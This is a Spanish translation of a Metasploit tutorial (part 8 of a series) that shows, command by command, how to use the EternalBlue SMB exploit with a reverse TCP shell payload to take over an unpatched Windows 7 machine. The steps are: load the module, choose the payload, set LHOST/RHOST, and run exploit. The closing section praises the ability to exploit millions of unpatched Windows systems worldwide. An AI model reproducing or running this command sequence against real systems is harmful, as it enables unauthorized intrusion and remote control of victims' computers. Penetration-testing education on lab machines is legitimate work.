You are on page 1of 6

Fundamentos de Metasploit,

Parte 8: Explotación con EternalBlue


12 de junio, 2017

OTW

Página Original del Articulo: Explotación con Eternal


Traducida por: Gustavo Rodríguez.

¡Bienvenida, mis aspirantes a hackers!

El marco Metasploit se ha convertido en una herramienta multipropósito: es una herramienta de


explotación. Hasta este punto de esta serie de documentos en Metasploit, nos hemos estado
llevando bien con los diversos aspectos de esta herramienta, pero ahora vamos a llegar a la mejor
parte, la explotación de otro sistema.

En la parte 7 de esta serie de documentos, agregamos un módulo. Muy a menudo los nuevos
módulos no son parte de la instalación básica, ni son parte de las actualizaciones (msfupdate).
Ese es el caso con el exploit EternalBlue de la NSA (al menos a partir de este escrito). Cuando
eso sucede, necesitamos agregar el módulo manualmente, como hicimos en la parte 7.

Ahora que tenemos EternalBlue en nuestro Framework de Metasploit, podemos usarlo para
explotar el sistema Windows 7 o Windows Server 2008. En este caso, tengo un sistema operativo
Windows 7x64 sin parche en el que probaré el exploit EternalBlue de la NSA.

¡Vamos a Hackear!
Paso # 1 Encender el Kali y comenzar la msfconsole

El primer paso, como siempre, es encender el Kali e iniciar la consola Metasploit.

kali > msfconsole

Paso # 2 Usar el Eternal Blue

Una vez que tenga el aviso "msf>", está listo para comenzar a explotar su sistema objetivo.
Necesitamos cargar el módulo de explotación EternalBlue en la consola Metasploit. Podemos
hacer esto al ingresar;

msf > use exploit/windows/smb/ms17_010_eternalblue

Si está cargando este módulo correctamente, debería verlo aquí. Si muestra "error al cargar el
módulo", no ha cargado correctamente el módulo EternalBlue. Regrese a la Parte 7 y cargue el
módulo EternalBlue.
Paso # 3 Visualizar la "Info"
Cuando primero se carga un módulo, lo primero que se recomienda verificar que sea "info".
Este provee información necesaria para el uso de cada módulo, así como información de cómo
trabaja el módulo.

msf > info

Como se puede ver en el gráfico anterior, Metasploit proporciona información básica (Nombre,
Plataforma, Privilegio, Rango, etc.) en el módulo, algunas opciones en el medio (no se muestra)
y una descripción del módulo en la parte inferior. (abajo).
Paso # 4 Establecer el Payload
Ahora que hemos cargado nuestro módulo y tenemos información básica, es hora de seleccionar una
carga útil (payload) para trabajar con él. Para ver todas los payloads que funcionarán con este módulo,
puede ingresar:

msf > show payloads

Es importante tener en cuenta que el comando "show payloads" se ejecuta después de


seleccionar el exploit mostraría solo el payloads que está trabajando ese exploit. Si lo ejecuta
antes de seleccionar el exploit, le mostraría TODOS los payloads.

En este ejemplo, probaremos un payload generic/shell_reverse_tcp, pero se puede usar


cualquiera que aparezca en la lista de payload. Si tenemos éxito con este payload, este nos
proporcionará el ingreso a la shell de comandos de Windows de nuestro sistema objetivo.

msf > set payload generic/shell_reverse_tcp

Paso # 5 Establecer las Opciones


El último paso antes de iniciar la explotación, es configurar nuestras opciones. Para ver qué
opciones combinaciones tenemos para el exploit y payload, ingrese;

msf > show options

Como puede ver, hay muchas opciones, pero las únicas opciones que usaremos son LHOST
(nuestra IP) y RHOST (la IP objetivo).

msf > set LHOST 192.168.1.101

msf > set RHOST 192.168.1.103


Después de establecer esas opciones, revisemos nuevamente las opciones para asegurarnos de
que todo se haya realizado correctamente.

msf > show options

Paso # 6 ¡Explota!
Todo parece estar bien, ¡así que todo lo que queda ahora es explotar ese sistema de Windows 7!

msf > exploit


Como puede en la imagen anterior, Metasploit y EternalBlue intentan explotar el protocolo SMB
de Windows 7. Y en la imagen a continuación vemos como Metasploit nos informa que se realizó
la explotación satisfactoriamente, y finalmente nos muestra el prompt de la línea de comandos
de Windows, del equipo objetivo. ¡Todo tal como lo esperábamos!

Para verificar que ahora estamos dentro del sistema de Windows del equipo objetivo, escriba
"dir" para ver si muestra los archivos y directorios de Windows que se encuentran en ese PC.

Conclusiones
El Framework de Metasploit es una herramienta esencial en casi todas las cajas de herramientas de hackers
/ pentesters. En esencia, es un marco de explotación con exploits, cargas útiles y módulos auxiliares para
todo tipo de sistemas. Cuando se agrega el exploit EternalBlue, ¡nos permite explotar los millones de
sistemas sin parches de Windows 7 y Windows 2008 en todo el planeta!

You might also like